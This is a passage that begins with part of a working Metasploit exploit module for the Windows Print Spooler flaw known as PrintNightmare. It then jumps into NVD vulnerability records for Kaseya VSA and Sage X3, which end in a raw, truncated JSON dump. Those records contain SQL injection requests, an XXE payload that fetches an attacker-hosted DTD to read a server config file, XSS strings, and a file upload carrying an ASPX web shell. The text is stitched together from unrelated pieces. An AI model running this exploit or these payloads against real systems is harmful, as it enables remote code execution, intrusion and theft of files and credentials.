              'Arch' => [ ARCH_X64, ARCH_X86 ]
            },
          ],
        ],
        'DisclosureDate' => '2021-06-08',
        'References' => [
          ['CVE', '2021-1675'],
          ['CVE', '2021-34527'],
          ['URL', 'https://github.com/cube0x0/CVE-2021-1675'],
          ['URL', 'https://web.archive.org/web/20210701042336/https://github.com/afwu/PrintNightmare'],
          ['URL', 'https://github.com/calebstewart/CVE-2021-1675/blob/main/CVE-2021-1675.ps1'],
          ['URL', 'https://github.com/byt3bl33d3r/ItWasAllADream']
        ],
        'Notes' => {
          'AKA' => [ 'PrintNightmare' ],
          'Stability' => [CRASH_SERVICE_DOWN],
          'Reliability' => [UNRELIABLE_SESSION],
          'SideEffects' => [
            ARTIFACTS_ON_DISK # the dll will be copied to the remote server
          ]
        }
      )
    )

    register_advanced_options(
      [
        OptInt.new('ReconnectTimeout', [ true, 'The timeout in seconds for reconnecting to the named pipe', 10 ])
      ]
    )
    deregister_options('AutoCheck')
  end

  def check
    begin
      connect(backend: :ruby_smb)
    rescue Rex::ConnectionError
      return Exploit::CheckCode::Unknown('Failed to connect to the remote service.')
    end

    begin
      smb_login
    rescue Rex::Proto::SMB::Exceptions::LoginError
      return Exploit::CheckCode::Unknown('Failed to authenticate to the remote service.')
    end

    begin
      dcerpc_bind_spoolss
    rescue RubySMB::Error::UnexpectedStatusCode => e
      nt_status = ::WindowsError::NTStatus.find_by_retval(e.status_code.value).first
      if nt_status == ::WindowsError::NTStatus::STATUS_OBJECT_NAME_NOT_FOUND
        print_error("The 'Print Spooler' service is disabled.")
      end
      return Exploit::CheckCode::Safe("The DCERPC bind failed with error #{nt_status.name} (#{nt_status.description}).")
    end

    @target_arch = dcerpc_getarch
    # see: https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rprn/e81cbc09-ab05-4a32-ae4a-8ec57b436c43
    if @target_arch == ARCH_X64
      @environment = 'Windows x64'
    elsif @target_arch == ARCH_X86
      @environment = 'Windows NT x86'
    else
      return Exploit::CheckCode::Detected('Successfully bound to the remote service.')
    end

    print_status("Target environment: Windows v#{simple.client.os_version} (#{@target_arch})")

    print_status('Enumerating the installed printer drivers...')
    drivers = enum_printer_drivers(@environment)
    @driver_path = "#{drivers.driver_path.rpartition('\\').first}\\UNIDRV.DLL"
    vprint_status("Using driver path: #{@driver_path}")

    print_status('Retrieving the path of the printer driver directory...')
    @config_directory = get_printer_driver_directory(@environment)
    vprint_status("Using driver directory: #{@config_directory}") unless @config_directory.nil?

    container = driver_container(
      p_config_file: 'C:\\Windows\\System32\\kernel32.dll',
      p_data_file: "\\??\\UNC\\127.0.0.1\\#{Rex::Text.rand_text_alphanumeric(4..8)}\\#{Rex::Text.rand_text_alphanumeric(4..8)}.dll"
    )

    case add_printer_driver_ex(container)
    when nil # prevent the module from erroring out in case the response can't be mapped to a Win32 error code
      return Exploit::CheckCode::Unknown('Received unknown status code, implying the target is not vulnerable.')
    when ::WindowsError::Win32::ERROR_PATH_NOT_FOUND
      return Exploit::CheckCode::Vulnerable('Received ERROR_PATH_NOT_FOUND, implying the target is vulnerable.')
    when ::WindowsError::Win32::ERROR_BAD_NET_NAME
      return Exploit::CheckCode::Vulnerable('Received ERROR_BAD_NET_NAME, implying the target is vulnerable.')
    when ::WindowsError::Win32::ERROR_ACCESS_DENIED
      return Exploit::CheckCode::Safe('Received ERROR_ACCESS_DENIED implying the target is patched.')
    end

    Exploit::CheckCode::Detected('Successfully bound to the remote service.')
  end

  def run
    fail_with(Failure::BadConfig, 'Can not use an x64 payload on an x86 target.') if @target_arch == ARCH_X86 && payload.arch.first == ARCH_X64
    fail_with(Failure::NoTarget, 'Only x86 and x64 targets are supported.') if @environment.nil?
    fail_with(Failure::Unknown, 'Failed to enumerate the driver directory.') if @config_directory.nil?

    super
  end

  def setup
    if Rex::Socket.is_ip_addr?(datastore['SRVHOST']) && Rex::Socket.addr_atoi(datastore['SRVHOST']) == 0
      fail_with(Exploit::Failure::BadConfig, 'The SRVHOST option must be set to a routable IP address.')
    end

    super
  end

  def start_service
    file_name << '.dll'
    self.file_contents = generate_payload_dll

    super
  end

  def primer
    dll_path = unc
    if dll_path =~ /^\\\\([\w:.\[\]]+)\\(.*)$/
      # targets patched for CVE-2021-34527 (but with Point and Print enabled) need to use this path style as a bypass
      # otherwise the operation will fail with ERROR_INVALID_PARAMETER
      dll_path = "\\??\\UNC\\#{Regexp.last_match(1)}\\#{Regexp.last_match(2)}"
    end
    vprint_status("Using DLL path: #{dll_path}")

    filename = dll_path.rpartition('\\').last
    container = driver_container(p_config_file: 'C:\\Windows\\System32\\kernel32.dll', p_data_file: dll_path)

    3.times do
      add_printer_driver_ex(container)
    end

    1.upto(3) do |directory|
      container.driver_info.p_config_file.assign("#{@config_directory}\\3\\old\\#{directory}\\#(unknown)")
      break if add_printer_driver_ex(container).nil?
    end

    cleanup_service
  end

  def driver_container(**kwargs)
    PrintSystem::DriverContainer.new(
      level: 2,
      tag: 2,
      driver_info: PrintSystem::DriverInfo2.new(
        c_version: 3,
        p_name_ref_id: 0x00020000,
        p_environment_ref_id: 0x00020004,
        p_driver_path_ref_id: 0x00020008,
        p_data_file_ref_id: 0x0002000c,
        p_config_file_ref_id: 0x00020010,
        # https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rprn/4464eaf0-f34f-40d5-b970-736437a21913
        p_name: "#{Rex::Text.rand_text_alpha_upper(2..4)} #{Rex::Text.rand_text_numeric(2..3)}",
        p_environment: @environment,
        p_driver_path: @driver_path,
        **kwargs
      )
    )
  end

  def dcerpc_bind_spoolss
    handle = dcerpc_handle(PrintSystem::UUID, '1.0', 'ncacn_np', ['\\spoolss'])
    vprint_status("Binding to #{handle} ...")
    dcerpc_bind(handle)
    vprint_status("Bound to #{handle} ...")
  end

  def enum_printer_drivers(environment)
    response = rprn_call('RpcEnumPrinterDrivers', p_environment: environment, level: 2)
    response = rprn_call('RpcEnumPrinterDrivers', p_environment: environment, level: 2, p_drivers: [0] * response.pcb_needed, cb_buf: response.pcb_needed)
    fail_with(Failure::UnexpectedReply, 'Failed to enumerate printer drivers.') unless response.p_drivers&.length
    DriverInfo2.read(response.p_drivers.map(&:chr).join)
  end

  def get_printer_driver_directory(environment)
    response = rprn_call('RpcGetPrinterDriverDirectory', p_environment: environment, level: 2)
    response = rprn_call('RpcGetPrinterDriverDirectory', p_environment: environment, level: 2, p_driver_directory: [0] * response.pcb_needed, cb_buf: response.pcb_needed)
    fail_with(Failure::UnexpectedReply, 'Failed to obtain the printer driver directory.') unless response.p_driver_directory&.length
    RubySMB::Field::Stringz16.read(response.p_driver_directory.map(&:chr).join).encode('ASCII-8BIT')
  end

  def add_printer_driver_ex(container)
    flags = PrintSystem::APD_INSTALL_WARNED_DRIVER | PrintSystem::APD_COPY_FROM_DIRECTORY | PrintSystem::APD_COPY_ALL_FILES

    begin
      response = rprn_call('RpcAddPrinterDriverEx', p_name: "\\\\#{datastore['RHOST']}", p_driver_container: container, dw_file_copy_flags: flags)
    rescue RubySMB::Error::UnexpectedStatusCode => e
      nt_status = ::WindowsError::NTStatus.find_by_retval(e.status_code.value).first
      message = "Error #{nt_status.name} (#{nt_status.description})"
      if nt_status == ::WindowsError::NTStatus::STATUS_PIPE_BROKEN
        # STATUS_PIPE_BROKEN is the return value when the payload is executed, so this is somewhat expected
        print_status('The named pipe connection was broken, reconnecting...')
        reconnected = retry_until_truthy(timeout: datastore['ReconnectTimeout'].to_i) do
          dcerpc_bind_spoolss
        rescue RubySMB::Error::CommunicationError, RubySMB::Error::UnexpectedStatusCode => e
          false
        else
          true
        end

        unless reconnected
          vprint_status('Failed to reconnect to the named pipe.')
          return nil
        end

        print_status('Successfully reconnected to the named pipe.')
        retry
      else
        print_error(message)
      end

      return nt_status
    end

    error = ::WindowsError::Win32.find_by_retval(response.error_status.value).first
    message = "RpcAddPrinterDriverEx response #{response.error_status}"
    message << " #{error.name} (#{error.description})" unless error.nil?
    vprint_status(message)
    error
  end

  def rprn_call(name, **kwargs)
    request = PrintSystem.const_get("#{name}Request").new(**kwargs)

    begin
      raw_response = dcerpc.call(request.opnum, request.to_binary_s)
    rescue Rex::Proto::DCERPC::Exceptions::Fault => e
      fail_with(Failure::UnexpectedReply, "The #{name} Print System RPC request failed (#{e.message}).")
    end

    PrintSystem.const_get("#{name}Response").read(raw_response)
  end

  class DriverInfo2Header < BinData::Record
    endian :little

    uint32 :c_version
    uint32 :name_offset
    uint32 :environment_offset
    uint32 :driver_path_offset
    uint32 :data_file_offset
    uint32 :config_file_offset
  end

  # this is a partial implementation that just parses the data, this is *not* the same struct as PrintSystem::DriverInfo2
  # see: https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rprn/2825d22e-c5a5-47cd-a216-3e903fd6e030
  DriverInfo2 = Struct.new(:header, :name, :environment, :driver_path, :data_file, :config_file) do
    def self.read(data)
      header = DriverInfo2Header.read(data)
      new(
        header,
        RubySMB::Field::Stringz16.read(data[header.name_offset..]).encode('ASCII-8BIT'),
        RubySMB::Field::Stringz16.read(data[header.environment_offset..]).encode('ASCII-8BIT'),
        RubySMB::Field::Stringz16.read(data[header.driver_path_offset..]).encode('ASCII-8BIT'),
        RubySMB::Field::Stringz16.read(data[header.data_file_offset..]).encode('ASCII-8BIT'),
        RubySMB::Field::Stringz16.read(data[header.config_file_offset..]).encode('ASCII-8BIT')
      )
    end
  end
end
```

### CVE-2021-30121 (NVD)

Semi-authenticated local file inclusion. The contents of arbitrary files can be returned by the webserver. Example request: `https://x.x.x.x/KLC/js/Kaseya.SB.JS/js.aspx?path=C:\Kaseya\WebPages\dl.asp`. A valid sessionId is required but can be easily obtained via CVE-2021-30118.

NVD record: CVE-2021-30121, CWE-829, published 2021-07-09T14:15:00, modified 2022-04-29T18:57:00. CVSS v3.1 6.5 MEDIUM (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N); CVSS v2 4.0 MEDIUM (AV:N/AC:L/Au:S/C:P/I:N/A:N). Related CVEs: CVE-2021-30118, CVE-2021-30121. <https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-30121>

### CVE-2020-7387 (NVD)

Sage X3 Installation Pathname Disclosure. A specially crafted packet can elicit a response from the AdxDSrv.exe component that reveals the installation directory of the product. Note that this vulnerability can be combined with CVE-2020-7388 to achieve full RCE. This issue was fixed in AdxAdmin 93.2.53, which ships with updates for on-premises versions of Sage X3 Version 9 (components shipped with Syracuse 9.22.7.2 and later), Sage X3 HR & Payroll Version 9 (those components that ship with Syracuse 9.24.1.3), Version 11 (components shipped with Syracuse 11.25.2.6 and later), and Version 12 (components shipped with Syracuse 12.10.2.8 and later) of Sage X3. Other on-premises versions of Sage X3 are unsupported by the vendor.

NVD record: CVE-2020-7387, CWE NVD-CWE-noinfo, published 2021-07-22T19:15:00, modified 2021-08-09T17:20:00. CVSS v3.1 5.3 MEDIUM (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N); CVSS v2 5.0 MEDIUM (AV:N/AC:L/Au:N/C:P/I:N/A:N). Related CVEs: CVE-2020-7387, CVE-2020-7388. <https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-7387>

### CVE-2021-30117 (NVD)

The API call /InstallTab/exportFldr.asp is vulnerable to a semi-authenticated boolean-based blind SQL injection in the parameter fldrId.

Detailed description --- Given the following request:

```
GET /InstallTab/exportFldr.asp?fldrId=1' HTTP/1.1
Host: 192.168.1.194
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.16; rv:85.0) Gecko/20100101 Firefox/85.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Cookie: ASPSESSIONIDCQACCQCA=MHBOFJHBCIPCJBFKEPEHEDMA; sessionId=30548861; agentguid=840997037507813; vsaUser=scopeId=3&roleId=2; webWindowId=59091519;
```

Where the sessionId cookie value has been obtained via CVE-2021-30116. The result should be a failure. Response:

```
HTTP/1.1 500 Internal Server Error
Cache-Control: private
Content-Type: text/html; Charset=Utf-8
Date: Thu, 01 Apr 2021 19:12:11 GMT
Strict-Transport-Security: max-age=63072000; includeSubDomains
Connection: close
Content-Length: 881

<!DOCTYPE html>
<HTML>
<HEAD>
<title>Whoops.</title>
<meta http-equiv="X-UA-Compatible" content="IE=Edge" />
<link id="favIcon" rel="shortcut icon" href="/themes/default/images/favicon.ico?307447361"></link>
----SNIP----
```

However, when fldrId is set to `(SELECT (CASE WHEN (1=1) THEN 1 ELSE (SELECT 1 UNION SELECT 2) END))` the request is allowed. Request:

```
GET /InstallTab/exportFldr.asp?fldrId=%28SELECT%20%28CASE%20WHEN%20%281%3D1%29%20THEN%201%20ELSE%20%28SELECT%201%20UNION%20SELECT%202%29%20END%29%29 HTTP/1.1
Host: 192.168.1.194
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.16; rv:85.0) Gecko/20100101 Firefox/85.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Cookie: ASPSESSIONIDCQACCQCA=MHBOFJHBCIPCJBFKEPEHEDMA; sessionId=30548861; agentguid=840997037507813; vsaUser=scopeId=3&roleId=2; webWindowId=59091519;
```

Response:

```
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; Charset=Utf-8
Date: Thu, 01 Apr 2021 17:33:53 GMT
Strict-Transport-Security: max-age=63072000; includeSubDomains
Connection: close
Content-Length: 7960

<html>
<head>
<title>Export Folder</title>
<style>
------ SNIP -----
```

NVD record: CVE-2021-30117, CWE-89, published 2021-07-09T14:15:00. CVSS v3.1 8.8 HIGH (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H); CVSS v2 6.5 MEDIUM (AV:N/AC:L/Au:S/C:P/I:P/A:P).
["CVE-2021-30116", "CVE-2021-30117"], "modified": "2022-04-29T18:59:00", "cpe": [], "id": "CVE-2021-30117", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-30117", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "cpe23": []}, {"lastseen": "2023-12-03T16:25:23", "description": "Sage X3 Unauthenticated Remote Command Execution (RCE) as SYSTEM in AdxDSrv.exe component. By editing the client side authentication request, an attacker can bypass credential validation. While exploiting this does require knowledge of the installation path, that information can be learned by exploiting CVE-2020-7387. This issue was fixed in AdxAdmin 93.2.53, which ships with updates for on-premises versions of Sage X3 including Version 9 (components shipped with Syracuse 9.22.7.2 and later), Sage X3 HR & Payroll Version 9 (those components that ship with Syracuse 9.24.1.3), Version 11 (components shipped with Syracuse 11.25.2.6 and later), and Version 12 (components shipped with Syracuse 12.10.2.8 and later) of Sage X3. 
Other on-premises versions of Sage X3 are unsupported by the vendor.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-22T19:15:00", "type": "cve", "title": "CVE-2020-7388", "cwe": ["CWE-290"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-7387", "CVE-2020-7388"], "modified": "2021-08-09T17:33:00", "cpe": [], "id": "CVE-2020-7388", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-7388", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": []}, {"lastseen": "2023-12-03T15:10:50", "description": "The API /vsaWS/KaseyaWS.asmx can be used to submit XML to the system. When this XML is processed (external) entities are insecurely processed and fetched by the system and returned to the attacker. 
Detailed description --- Given the following request: ``` POST /vsaWS/KaseyaWS.asmx HTTP/1.1 Content-Type: text/xml;charset=UTF-8 Host: 192.168.1.194:18081 Content-Length: 406 <soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:kas=\"KaseyaWS\"> <soapenv:Header/> <soapenv:Body> <kas:PrimitiveResetPassword> <!--type: string--> <kas:XmlRequest><![CDATA[<!DOCTYPE data SYSTEM \"http://192.168.1.170:8080/oob.dtd\"><data>&send;</data>]]> </kas:XmlRequest> </kas:PrimitiveResetPassword> </soapenv:Body> </soapenv:Envelope> ``` And the following XML file hosted at http://192.168.1.170/oob.dtd: ``` <!ENTITY % file SYSTEM \"file://c:\\\\kaseya\\\\kserver\\\\kserver.ini\"> <!ENTITY % eval \"<!ENTITY % error SYSTEM 'file:///nonexistent/%file;'>\"> %eval; %error; ``` The server will fetch this XML file and process it: it will read the file c:\\\\kaseya\\\\kserver\\\\kserver.ini and return the content in the server response like below. Response: ``` HTTP/1.1 500 Internal Server Error Cache-Control: private Content-Type: text/xml; charset=utf-8 Date: Fri, 02 Apr 2021 10:07:38 GMT Strict-Transport-Security: max-age=63072000; includeSubDomains Connection: close Content-Length: 2677 <?xml version=\"1.0\" encoding=\"utf-8\"?><soap:Envelope xmlns:soap=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\"><soap:Body><soap:Fault><faultcode>soap:Server</faultcode><faultstring>Server was unable to process request. ---> There is an error in XML document (24, -1000).\\r\\n\\r\\nSystem.Xml.XmlException: Fragment identifier '######################################################################## # This is the configuration file for the KServer. # Place it in the same directory as the KServer executable # A blank line or new valid section header [] terminates each section.
# Comment lines start with ; or # ######################################################################## <snip> ``` Security issues discovered --- * The API insecurely resolves external XML entities * The API has an overly verbose error response Impact --- Using this vulnerability an attacker can read any file on the server the webserver process can read. Additionally, it can be used to perform HTTP(s) requests into the local network and thus use the Kaseya system to pivot into the local network.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-07-09T14:15:00", "type": "cve", "title": "CVE-2021-30201", "cwe": ["CWE-611"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-30201"], "modified": "2022-04-29T18:14:00", "cpe": [], "id": "CVE-2021-30201", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-30201", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cpe23": []}, {"lastseen": "2023-12-03T15:10:21", "description": "Authenticated reflective XSS in HelpDeskTab/rcResults.asp The parameter result of /HelpDeskTab/rcResults.asp is insecurely returned in the requested 
web page and can be used to perform a Cross Site Scripting attack. Example request: `https://x.x.x.x/HelpDeskTab/rcResults.asp?result=<script>alert(document.cookie)</script>` The same is true for the parameter FileName of /done.asp. Example request: `https://x.x.x.x/done.asp?FileName=\";</script><script>alert(1);a=\"&PathData=&originalName=shell.aspx&FileSize=4388&TimeElapsed=00:00:00.078`", "cvss3": {"exploitabilityScore": 2.3, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "LOW", "baseScore": 5.4, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 2.7}, "published": "2021-07-09T14:15:00", "type": "cve", "title": "CVE-2021-30119", "cwe": ["CWE-79"], "bulletinFamily": "NVD", "cvss2": {"severity": "LOW", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 3.5, "vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-30119"], "modified": "2022-04-29T18:15:00", "cpe": [], "id": "CVE-2021-30119", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-30119", "cvss": {"score": 3.5, "vector": "AV:N/AC:M/Au:S/C:N/I:P/A:N"}, "cpe23": []}, {"lastseen": "2023-12-03T15:10:22", "description": "Kaseya VSA before 9.5.7 allows attackers to bypass the 2FA requirement. The need to use 2FA for authentication is enforced client-side instead of server-side and can be bypassed using a local proxy, thus rendering 2FA useless.
Detailed description --- During the login process, after the user authenticates with username and password, the server sends a response to the client with the booleans MFARequired and MFAEnroled. If the attacker has obtained a password of a user and uses an intercepting proxy (e.g. Burp Suite) to change the value of MFARequired from True to False, there is no prompt for the second factor, but the user is still logged in.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-07-09T14:15:00", "type": "cve", "title": "CVE-2021-30120", "cwe": ["CWE-669"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-30120"], "modified": "2022-07-12T17:42:00", "cpe": ["cpe:/a:kaseya:vsa:9.5.6"], "id": "CVE-2021-30120", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-30120", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}, "cpe23": ["cpe:2.3:a:kaseya:vsa:9.5.6:*:*:*:-:*:*:*"]}, {"lastseen": "2023-12-03T16:25:25", "description": "Sage X3 Stored XSS Vulnerability on \u2018Edit\u2019 Page of User Profile.
An authenticated user can pass XSS strings to the \"First Name,\" \"Last Name,\" and \"Email Address\" fields of this web application component. Updates are available for on-premises versions of Version 12 (components shipped with Syracuse 12.10.0 and later) of Sage X3. Other on-premises versions of Sage X3 are unaffected or unsupported by the vendor.", "cvss3": {"exploitabilityScore": 2.3, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "LOW", "baseScore": 5.4, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 2.7}, "published": "2021-07-22T19:15:00", "type": "cve", "title": "CVE-2020-7390", "cwe": ["CWE-79"], "bulletinFamily": "NVD", "cvss2": {"severity": "LOW", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 3.5, "vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-7390"], "modified": "2023-11-07T03:26:00", "cpe": [], "id": "CVE-2020-7390", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-7390", "cvss": {"score": 3.5, "vector": "AV:N/AC:M/Au:S/C:N/I:P/A:N"}, "cpe23": []}, {"lastseen": "2023-12-03T15:10:19", "description": "An attacker can upload files with the privilege of the Web Server process for Kaseya VSA Unified Remote Monitoring & Management (RMM) 9.5.4.2149 and subsequently use these files to execute asp commands. The api /SystemTab/uploader.aspx is vulnerable to an unauthenticated arbitrary file upload leading to RCE.
An attacker can upload files with the privilege of the Web Server process and subsequently use these files to execute asp commands. Detailed description --- Given the following request: ``` POST /SystemTab/uploader.aspx?Filename=shellz.aspx&PathData=C%3A%5CKaseya%5CWebPages%5C&__RequestValidationToken=ac1906a5-d511-47e3-8500-47cc4b0ec219&qqfile=shellz.aspx HTTP/1.1 Host: 192.168.1.194 Cookie: sessionId=92812726; %5F%5FRequestValidationToken=ac1906a5%2Dd511%2D47e3%2D8500%2D47cc4b0ec219 Content-Length: 12 <%@ Page Language=\"C#\" Debug=\"true\" validateRequest=\"false\" %> <%@ Import namespace=\"System.Web.UI.WebControls\" %> <%@ Import namespace=\"System.Diagnostics\" %> <%@ Import namespace=\"System.IO\" %> <%@ Import namespace=\"System\" %> <%@ Import namespace=\"System.Data\" %> <%@ Import namespace=\"System.Data.SqlClient\" %> <%@ Import namespace=\"System.Security.AccessControl\" %> <%@ Import namespace=\"System.Security.Principal\" %> <%@ Import namespace=\"System.Collections.Generic\" %> <%@ Import namespace=\"System.Collections\" %> <script runat=\"server\"> private const string password = \"pass\"; // The password ( pass ) private const string style = \"dark\"; // The style ( light / dark ) protected void Page_Load(object sender, EventArgs e) { //this.Remote(password); this.Login(password); this.Style(); this.ServerInfo(); <snip> ``` The attacker can control the name of the file written via the qqfile parameter and the location of the file written via the PathData parameter. Even though the call requires that a sessionId cookie is passed we have determined that the sessionId is not actually validated and any numeric value is accepted as valid. 
Security issues discovered --- * a sessionId cookie is required by /SystemTab/uploader.aspx, but is not actually validated, allowing an attacker to bypass authentication * /SystemTab/uploader.aspx allows an attacker to create a file with arbitrary content in any place the webserver has write access * The web server process has write access to the webroot where the attacker can execute it by requesting the URL of the newly created file. Impact --- This arbitrary file upload allows an attacker to place files of his own choosing on any location on the hard drive of the server the webserver process has access to, including (but not limited to) the webroot. If the attacker uploads files with code to the webroot (e.g. aspx code) he can then execute this code in the context of the webserver to breach either the integrity, confidentiality, or availability of the system or to steal credentials of other users. In other words, this can lead to a full system compromise.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-09T14:15:00", "type": "cve", "title": "CVE-2021-30118", "cwe": ["CWE-434"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, 
